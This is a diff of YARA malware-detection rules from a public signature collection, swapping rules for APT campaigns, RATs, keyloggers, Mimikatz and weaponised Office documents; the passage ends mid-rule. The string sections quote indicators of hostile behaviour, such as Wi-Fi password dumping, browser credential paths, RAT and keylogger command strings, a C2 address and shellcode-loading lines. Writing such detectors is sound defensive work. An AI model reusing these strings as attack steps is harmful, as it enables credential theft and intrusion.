-		description = "Detects malware from FreeMilk campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ef5f400c-16f8-5374-af16-c8530ddb87ee"
-		date = "2017-10-05"
+		description = "Modular malware framework with similarities to EHDevel"
+		author = "James E.C, ProofPoint"
+		id = "6dd07019-aa5a-5966-8331-b6f6758b0652"
+		date = "2018-08-03"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_freemilk.yar#L41-L60"
+		reference = "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_donotteam_ytyframework.yar#L3-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ad2cc04542e93add3e7856574d4de5aa371cc31542f87b1e90d30e12e0149341"
+		hash = "1e0c1b97925e1ed90562d2c68971e038d8506b354dd6c1d2bcc252d2a48bc31c"
+		logic_hash = "8e2841fd4550f12d88fb451a893f1ba41f0d3c123d9c195fe97366202376ef61"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df"
+		quality = 83
+		tags = "APT, DONOTTEAM, WINDOWS, FILE"
 
 	strings:
-		$s1 = "failed to take the screenshot. err: %d" fullword ascii
-		$s2 = "runsample" fullword wide
-		$s3 = "%s%02X%02X%02X%02X%02X%02X:" fullword wide
-		$s4 = "win-%d.%d.%d-%d" fullword wide
+		$x1 = "/football/download2/" ascii wide
+		$x2 = "/football/download/" ascii wide
+		$x3 = "Caption: Xp>" wide
+		$x_c2 = "5.135.199.0" ascii fullword
+		$a1 = "getGoogle" ascii fullword
+		$a2 = "/q /noretstart" wide
+		$a3 = "IsInSandbox" ascii fullword
+		$a4 = "syssystemnew" ascii fullword
+		$a5 = "ytyinfo" ascii fullword
+		$a6 = "\\ytyboth\\yty " ascii
+		$s1 = "SELECT Name FROM Win32_Processor" wide
+		$s2 = "SELECT Caption FROM Win32_OperatingSystem" wide
+		$s3 = "SELECT SerialNumber FROM Win32_DiskDrive" wide
+		$s4 = "VM: Yes" wide fullword
+		$s5 = "VM: No" wide fullword
+		$s6 = "helpdll.dll" ascii fullword
+		$s7 = "boothelp.exe" ascii fullword
+		$s8 = "SbieDll.dll" wide fullword
+		$s9 = "dbghelp.dll" wide fullword
+		$s10 = "YesNoMaybe" ascii fullword
+		$s11 = "saveData" ascii fullword
+		$s12 = "saveLogs" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "b86f7d2c1c182ec4c074ae1e16b7a3f5" or all of them )
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and ( pe.imphash ( ) == "87775285899fa860b9963b11596a2ded" or 1 of ( $x* ) or 3 of ( $a* ) or 6 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Freemilk_APT_Mal_3 : FILE
+rule SIGNATURE_BASE_MAL_Backnet_Nov18_1 : FILE
 {
 	meta:
-		description = "Detects malware from FreeMilk campaign"
+		description = "Detects BackNet samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "152781f0-756b-50ab-b588-4af5fa4ce419"
-		date = "2017-10-05"
+		id = "f8575c5a-710d-5e97-91c1-5db454c6baf4"
+		date = "2018-11-02"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_freemilk.yar#L62-L78"
+		reference = "https://github.com/valsov/BackNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_backnet.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "be68f624a2a374525857193d27f0645be5d10c198954dd90350448c3127e4bb5"
+		logic_hash = "ea809a65a3cd786efe03ff7d831847e658851f76ee9dd084cb6c622b6e44c75f"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ef40f7ddff404d1193e025081780e32f88883fa4dd496f4189084d772a435cb2"
+		hash1 = "4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc"
 
 	strings:
-		$s1 = "CMD.EXE /C \"%s\"" fullword wide
-		$s2 = "\\command\\start.exe" wide
-		$s3 = ".bat;.com;.cmd;.exe" fullword wide
-		$s4 = "Unexpected failure opening HKCR key: %d" fullword ascii
+		$s1 = "ProcessedByFody" fullword ascii
+		$s2 = "SELECT * FROM AntivirusProduct" fullword wide
+		$s3 = "/C netsh wlan show profile" wide
+		$s4 = "browsertornado" fullword wide
+		$s5 = "Current user is administrator" fullword wide
+		$s6 = "/C choice /C Y /N /D Y /T 4 & Del" wide
+		$s7 = "ThisIsMyMutex-2JUY34DE8E23D7" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them
 }
-
-rule SIGNATURE_BASE_Freemilk_APT_Mal_4 : FILE
+rule SIGNATURE_BASE_Crimsonrat_Mar18_1 : FILE
 {
 	meta:
-		description = "Detects malware from FreeMilk campaign"
+		description = "Detects CrimsonRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "44f919f7-8eda-5e70-88d5-9e81a761192c"
-		date = "2017-10-05"
+		id = "af21876c-f99d-5307-abba-02c57ee93df0"
+		date = "2018-03-06"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_freemilk.yar#L80-L104"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_crimson_rat.yar#L11-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "deedb1da7e3421cd300fceea354a690e22005bab16eb0cc20b46f912393b637d"
+		logic_hash = "59b01a98a70c4bac08d396418fac24eb96e461a45502f63edc2a9aa87e05f960"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
+		hash1 = "acf2e8013b6fafcf436d5a05049896504ffa2e982bca05155d19981d1931c611"
+		hash2 = "7ca6e5ef1d346ec35993c910128a3526b098a07445131784a9358bf5679e3975"
+		hash3 = "be4264973de9886caedae1cb707586588d0da85ac7a2ad277db4258033ea12a8"
+		hash4 = "acf2e8013b6fafcf436d5a05049896504ffa2e982bca05155d19981d1931c611"
+		hash5 = "ff52b4a64ed7caeab00350e493968dbdb159aeb545fcba67d83ab9b158464de4"
 
 	strings:
-		$x1 = "base64Encoded=\"TVqQAAMAAAAE" ascii
-		$s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
-		$s2 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
-		$s3 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
-		$s4 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
-		$s5 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
-		$s6 = "command =outFile &\" sysupdate\"" fullword ascii
+		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" wide
+		$x2 = "\\Release\\RTLBot.pdb" ascii
+		$x3 = "cmd.exe/c systeminfo >> 1.txt" fullword wide
+		$x4 = "/online >> Get online target with important info" fullword wide
+		$x5 = "/screen >> ScreenShot from target PC" fullword wide
+		$x6 = "/restart >> Restart Target PC" fullword wide
+		$x7 = "/log_key >> Get log key file" fullword wide
+		$a1 = "get_ShiftKey" fullword ascii
+		$a2 = "get_ControlKey" fullword ascii
+		$a3 = "get_AltKey" fullword ascii
+		$a4 = "get_MineInterval" fullword ascii
+		$fp1 = "Copyright Software Secure" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( ( pe.exports ( "getUpdate" ) and pe.number_of_exports == 1 ) or 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or all of ( $a* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_1 : FILE
+rule SIGNATURE_BASE_Invoke_Mimikatz
 {
 	meta:
-		description = "Detects Lazarus VHD Ransomware"
+		description = "Detects Invoke-Mimikatz String"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5cb3c136-ec5c-5596-8dcc-e4c6ef33050a"
-		date = "2020-10-05"
+		id = "37de51a6-e1bb-5ee7-9b7f-8fe17b3697b5"
+		date = "2016-08-03"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_vhd_ransomware.yar#L2-L24"
+		reference = "https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_invoke_mimikatz.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "95c56c5111bb227da8f8a3f8aa4f23e1348bc76ff76a05fc3cae89f9fad1bb52"
+		logic_hash = "b9bfa54a64d6f6b8af97ec62c9102ccf0912a19b65fbd25a4836480e63497a00"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
-		hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
-		hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67"
 
 	strings:
-		$s1 = "HowToDecrypt.txt" wide fullword
-		$s2 = "rsa.cpp" wide fullword
-		$s3 = "sc stop \"Microsoft Exchange Compliance Service\"" ascii fullword
-		$op1 = { 8b 8d bc fc ff ff 8b 94 bd 34 03 00 00 33 c0 50 }
-		$op2 = { 8b 8d 98 f9 ff ff 8d 64 24 00 8b 39 3b bc 85 34 }
-		$op3 = { 8b 94 85 34 03 00 00 89 11 40 83 c1 04 3b 06 7c }
+		$x2 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm" ascii
+		$x3 = "Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_NK_Lazarus_VHD_Ransomware_Oct20_2 : FILE
+rule SIGNATURE_BASE_Rocketkitten_Keylogger : FILE
 {
 	meta:
-		description = "Detects Lazarus VHD Ransomware"
+		description = "Detects Keylogger used in Rocket Kitten APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b75668de-93e6-57e7-90f0-fa335295be7c"
-		date = "2020-10-05"
+		id = "558341db-a30d-586e-8efc-0fff1d8f94a1"
+		date = "2015-09-01"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_vhd_ransomware.yar#L26-L43"
+		reference = "https://goo.gl/SjQhlp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_rocketkitten_keylogger.yar#L8-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cf28771a854b3bacc911375c09f6c6bc6ddebff95612a509890c56a5a14e8921"
+		logic_hash = "c8523a50075c6ee9675d37d870da55d9e6193bbc770f6b916e700ab9aad438cc"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "097ca829e051a4877bca093cee340180ff5f13a9c266ad4141b0be82aae1a39b"
-		hash2 = "73a10be31832c9f1cbbd798590411009da0881592a90feb472e80025dfb0ea79"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "1c9e519dca0468a87322bebe2a06741136de7969a4eb3efda0ab8db83f0807b4"
+		hash2 = "495a15f9f30d6f6096a97c2bd8cc5edd4d78569b8d541b1d5a64169f8109bc5b"
 
 	strings:
-		$op1 = { f9 36 88 08 8d ad fc ff ff ff 66 ff c1 e9 72 86 }
-		$op2 = { c6 c4 58 0f a4 c8 12 8d ad ff ff ff ff 0f b6 44 }
-		$op3 = { 88 02 66 c1 f0 54 8d bf fc ff ff ff 0f ba e0 19 }
+		$x1 = "\\Release\\CWoolger.pdb" ascii
+		$x2 = "WoolenLoger\\obj\\x86\\Release" ascii
+		$x3 = "D:\\Yaser Logers\\"
+		$z1 = "woolger" fullword wide
+		$s1 = "oShellLink.TargetPath = \"" fullword ascii
+		$s2 = "wscript.exe " fullword ascii
+		$s3 = "strSTUP = WshShell.SpecialFolders(\"Startup\")" fullword ascii
+		$s4 = "[CapsLock]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or ( $z1 and 2 of ( $s* ) ) ) ) or ( $z1 and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT17_Sample_FXSST_DLL : FILE
+rule SIGNATURE_BASE_Mimikatz_Kirbi_Ticket : FILE
 {
 	meta:
-		description = "Detects Samples related to APT17 activity - file FXSST.DLL"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e4b9b25e-8895-5ba5-b706-bfb6892c16ae"
-		date = "2015-05-14"
+		description = "KiRBi ticket for mimikatz"
+		author = "Benjamin DELPY (gentilkiwi); Didier Stevens"
+		id = "a37249e0-ab3b-50c2-9473-1e69185713cc"
+		date = "2016-08-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/ZiJyQv"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt17_malware.yar#L10-L36"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_kirbi_mimkatz.yar#L10-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"
-		logic_hash = "51d6da6c3ec46dc9e991a6a36de6d79626f1859296cda65e9027951c13aa4cd5"
+		logic_hash = "2a62c24954d64346e419985ef5bf2b357b2aee41ac6b33d379dbd65cf5c9f92b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Microsoft? Windows? Operating System" fullword wide
-		$x2 = "fxsst.dll" fullword ascii
-		$y1 = "DllRegisterServer" fullword ascii
-		$y2 = ".cSV" fullword ascii
-		$s1 = "GetLastActivePopup"
-		$s2 = "Sleep"
-		$s3 = "GetModuleFileName"
-		$s4 = "VirtualProtect"
-		$s5 = "HeapAlloc"
-		$s6 = "GetProcessHeap"
-		$s7 = "GetCommandLine"
+		$asn1 = { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 }
+		$asn1_84 = { 76 84 ?? ?? ?? ?? 30 84 ?? ?? ?? ?? a0 84 00 00 00 03 02 01 05 a1 84 00 00 00 03 02 01 16 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( all of ( $x* ) or all of ( $y* ) ) and all of ( $s* )
+		$asn1 at 0 or $asn1_84 at 0
 }
-rule SIGNATURE_BASE_Wmimplant
+rule SIGNATURE_BASE_Enigmapacker_Rare : FILE
 {
 	meta:
-		description = "Auto-generated rule - file WMImplant.ps1"
+		description = "Detects an ENIGMA packed executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "18dadc55-e12f-5c4c-9e11-27dc2d6c8dd2"
-		date = "2017-03-24"
+		id = "748bc74c-e83f-5740-8ff7-f1371fc22802"
+		date = "2017-04-27"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_wmi_implant.yar#L10-L28"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_enigma_protector.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6422514d25b723e7ab92c1af1301e51d9a93aa41da98791d96c4754a91b5a18e"
-		score = 75
+		logic_hash = "a001b563db1b75581432d42a435683f24e244b6b354f83409b5b9d6d0314d63a"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "860d7c237c2395b4f51b8c9bd0ee6cab06af38fff60ce3563d160d50c11d2f78"
+		hash1 = "77be6e80a4cfecaf50d94ee35ddc786ba1374f9fe50546f1a3382883cb14cec9"
 
 	strings:
-		$x1 = "Invoke-ProcessPunisher -Creds $RemoteCredential" fullword ascii
-		$x2 = "$Target -query \"SELECT * FROM Win32_NTLogEvent WHERE (logfile='security')" ascii
-		$x3 = "WMImplant -Creds" fullword ascii
-		$x4 = "-Download -RemoteFile C:\\passwords.txt" ascii
-		$x5 = "-Command 'powershell.exe -command \"Enable-PSRemoting" fullword ascii
-		$x6 = "Invoke-WMImplant" fullword ascii
+		$s1 = "P.rel$oc$" fullword ascii
+		$s2 = "ENIGMA" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
 }
-rule SIGNATURE_BASE_Malrtf_Ole2Link : EXPLOIT FILE
+rule SIGNATURE_BASE_Enigma_Protected_Malware_May17_Rhxfiles : FILE
 {
 	meta:
-		description = "Detects weaponized RTF documents with OLE2Link exploit"
-		author = "@h3x2b <tracker _AT h3x.eu>"
-		id = "5080e79a-3abc-5fc3-902e-b362f20510f9"
-		date = "2017-04-12"
+		description = "Auto-generated rule - file RhxFiles.dll"
+		author = "Florian Roth (Nextron Systems) with the help of binar.ly"
+		id = "d701d591-4283-5645-8768-a5ab7df0f37a"
+		date = "2017-05-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_rtf_ole2link.yar#L1-L23"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_enigma_protector.yar#L25-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d7ef764a0006b81c2b50699aa1fccb35c7c7da982cb8d56e02097114468e298f"
+		logic_hash = "838ab7dddda798d2f5c79fc5417693f8489195b3024c43d9ad1aab05fcfd71eb"
 		score = 75
 		quality = 85
-		tags = "EXPLOIT, FILE"
+		tags = "FILE"
+		hash1 = "2187d6bd1794bf7b6199962d8a8677f19e4382a124c30933d01aba93cc1f0f15"
 
 	strings:
-		$rtf_olelink_01 = "\\objdata" nocase
-		$rtf_olelink_02 = "4f4c45324c696e6b" nocase
-		$rtf_olelink_03 = "d0cf11e0a1b11ae1" nocase
-		$rtf_payload_01 = "68007400740070003a002f002f00" nocase
-		$rtf_payload_02 = "680074007400700073003a002f002f00" nocase
-		$rtf_payload_03 = "6600740070003a002f002f00" nocase
+		$op1 = { bd 9c 74 f6 7a 3a f7 94 c5 7d 7c 7c 7c 7e ae 73 }
+		$op2 = { 82 62 6b 6b 6b 68 a5 ea aa 69 6b 6b 6b 3a 3b 94 }
+		$op3 = { 7c 7c c5 7d 7c 7c 7c 7e ae 73 f9 79 7c 7c 7c f6 }
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of ( $rtf_olelink_* ) and any of ( $rtf_payload_* )
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_LNK_Embedded_Worddoc : FILE
+rule SIGNATURE_BASE_Enigma_Protected_Malware : FILE
 {
 	meta:
-		description = "check for LNK files with indications of the Word program or an embedded doc"
-		author = "Greg Lesnewich"
-		id = "9677d41a-9d29-510c-98cd-122dc0ca9606"
-		date = "2023-01-02"
+		description = "Detects samples packed by Enigma Protector"
+		author = "Florian Roth (Nextron Systems) with the help of binar.ly"
+		id = "d701d591-4283-5645-8768-a5ab7df0f37a"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L3-L20"
+		reference = "https://goo.gl/OEVQ9w"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_enigma_protector.yar#L41-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "120ca851663ef0ebef585d716c9e2ba67bd4870865160fec3b853156be1159c5"
-		logic_hash = "a53fbfe0ccb5a4ab2320cde10d17f29770d888cf21cda4fdccc3d7ae8d123293"
-		score = 65
+		logic_hash = "1a254d4d593b73d16d1cfbd73d7d4b2732a080cb98d70972de0826433b004152"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "2/100"
+		hash1 = "d4616f9706403a0d5a2f9a8726230a4693e4c95c58df5c753ccc684f1d3542e2"
 
 	strings:
-		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
-		$icon_loc = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.exe" ascii wide
+		$s1 = { 5d 5d 5d aa bf 5e 95 d6 dc 51 5d 5d 5d 5e 98 0d }
+		$s2 = { 52 d9 47 5d 5d 5d dd a6 b4 52 d9 4c 5d 5d 5d 3b }
+		$s3 = { 9f 59 14 52 d8 a9 a2 a2 a2 00 9f 51 5d d6 d1 79 }
 
 	condition:
-		uint32be( 0x0 ) == 0x4C000000 and filesize > 10KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_LNK_Smallscreensize
+rule SIGNATURE_BASE_MAL_Sharpshooter_Excel4 : FILE
 {
 	meta:
-		description = "check for LNKs that have a screen buffer size and WindowSize dimensions of 1x1"
-		author = "Greg Lesnewich"
-		id = "6194a76b-36d6-51d1-8d53-2e11172e29d2"
-		date = "2023-01-01"
+		description = "Detects Excel documents weaponized with Sharpshooter"
+		author = "John Lambert, Florian Roth"
+		id = "a79e3afe-e8f9-5e56-a131-bb1b346df471"
+		date = "2020-03-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L22-L44"
+		reference = "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/00b5dd7d-51ca-4938-b7b7-483fe0e5933b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_Excel4Macro_Sharpshooter.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "285985c21e34f8412b49dbfe04abad9f93af195801d0a8870ec3795b8a9a3787"
-		score = 65
+		hash = "ccef64586d25ffcb2b28affc1f64319b936175c4911e7841a0e28ee6d6d4a02d"
+		logic_hash = "4aec8bb7ec8ce7ebd8228416133ea7eec995864aeec78c11548387d832b5fa65"
+		score = 70
 		quality = 85
-		tags = ""
-		version = "1.0"
-		DaysofYARA = "1/100"
+		tags = "FILE"
 
 	strings:
-		$dimensions = {02 00 00 A0 ?? 00 ?? ?? 01 00 01 00 01}
+		$header_docf = { D0 CF 11 E0 }
+		$s1 = "Excel 4.0 Macros"
+		$f1 = "CreateThread" ascii fullword
+		$f2 = "WriteProcessMemory" ascii fullword
+		$f3 = "Kernel32" ascii fullword
+		$concat = { 00 41 6f 00 08 1e ?? 00 41 6f 00 08 1e ?? 00 41 6f 00 08}
 
 	condition:
-		uint32be( 0x0 ) == 0x4c000000 and all of them
+		filesize < 1000KB and $header_docf at 0 and #concat > 10 and $s1 and 2 of ( $f* )
 }
-rule SIGNATURE_BASE_MAL_Janicab_LNK
+rule SIGNATURE_BASE_SUSP_Excel4Macro_Autoopen : FILE
 {
 	meta:
-		description = "detect LNK files used in Janicab infection chain"
-		author = "Greg Lesnewich"
-		id = "c21844d3-eeee-530e-a69c-b7f604616f0b"
-		date = "2023-01-01"
+		description = "Detects Excel4 macro use with auto open / close"
+		author = "John Lambert @JohnLaTwC"
+		id = "cfed97fe-b330-5528-8402-08c6ba6af04a"
+		date = "2020-03-26"
 		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L46-L68"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_Excel4Macro_Sharpshooter.yar#L27-L69"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0c7e8427ee61672568983e51bf03e0bcf6f2e9c01d2524d82677b20264b23a3f"
-		hash = "22ede766fba7551ad0b71ef568d0e5022378eadbdff55c4a02b42e63fcb3b17c"
-		hash = "4920e6506ca557d486e6785cb5f7e4b0f4505709ffe8c30070909b040d3c3840"
-		hash = "880607cc2da4c3213ea687dabd7707736a879cc5f2f1d4accf79821e4d24d870"
-		hash = "f4610b65eba977b3d13eba5da0e38788a9e796a3e9775dd2b8e37b3085c2e1af"
-		logic_hash = "f9c000ffb6a95d616459e00f0220ad26cb1df77e35582d14dfce1637ddfb466c"
-		score = 75
+		hash = "2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f"
+		logic_hash = "074aab8e1d3b66e34e8e8d8e8489e1dfee1091df0424b22cd1bfd3cf904754e1"
+		score = 50
 		quality = 85
-		tags = ""
-		version = "1.0"
-		DaysofYARA = "1/100"
+		tags = "FILE"
 
 	strings:
-		$j_pdf1 = "%PDF-1.5" ascii wide
-		$j_cmd = "\\Windows\\System32\\cmd.exe" ascii wide
-		$j_pdf_stream = "endstream" ascii wide
-		$j_pdb_obj = "endobj" ascii wide
-		$dimensions = {02 00 00 A0 ?? 00 ?? ?? 01 00 01 00 01}
+		$header_docf = { D0 CF 11 E0 }
+		$s1 = "Excel" fullword
+		$Auto_Open = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
+		$Auto_Close = {18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
+		$Auto_Open1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a }
+		$Auto_Close1 = {18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a }
 
 	condition:
-		uint32be( 0x0 ) == 0x4C000000 and $dimensions and 2 of ( $j_* )
+		filesize < 3000KB and $header_docf at 0 and $s1 and any of ( $Auto_* )
 }
-rule SIGNATURE_BASE_SUSP_ELF_Invalid_Version : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Revil_Oct20_1 : FILE
 {
 	meta:
-		description = "Identify ELF file that has mangled header info."
-		author = "@shellcromancer"
-		id = "5bd97fdd-0912-5f9b-877c-91fff9b98dea"
-		date = "2023-01-01"
